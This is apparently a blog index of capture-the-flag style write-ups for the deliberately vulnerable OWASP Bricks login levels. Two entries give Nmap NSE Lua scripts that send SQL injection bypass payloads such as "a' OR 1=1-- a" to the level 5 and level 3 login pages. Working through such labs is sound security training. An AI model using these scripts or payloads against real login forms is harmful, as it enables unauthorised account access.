Posts

Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 5 is just a simple SQL injection which will convert password into md5 hash. We could easily overcome it by injecting in username field. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 local http = require "http" local shortport = require "shortport" portrule = shortport.http action = function(host,port) local resp,final,query r={} r['username']="a' OR 1=1-- a" r['passwd']="test" r['submit']="Submit" resp = http.post(host,port,"/login-5/index.php",nil,nil,r) final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>') query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>") return {payload = r ,SQLQuery = query , result = final} end This code is built based on http-title.nse. ...

Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 4 is just a SQL injection with bracket and uses double quote. Here’s an example: SQL Query: SELECT * FROM users WHERE name=("a") and password=("a"). We could just modify previous NSE script by changing the query. ...

Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 3 is just a slightly harder SQL injection as it add brackets. Here’s an example: SQL Query: SELECT * FROM users WHERE name=('1') and password=('1') LIMIT 0,1. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 local http = require "http" local shortport = require "shortport" portrule = shortport.http action = function(host,port) local resp,final,query r={} r['username']="a') OR 1=1-- a" r['passwd']="test" r['submit']="Submit" resp = http.post(host,port,"/login-3/index.php",nil,nil,r) final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>') query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>") return {payload = r ,SQLQuery = query , result = final} end This code is built based on http-title.nse. ...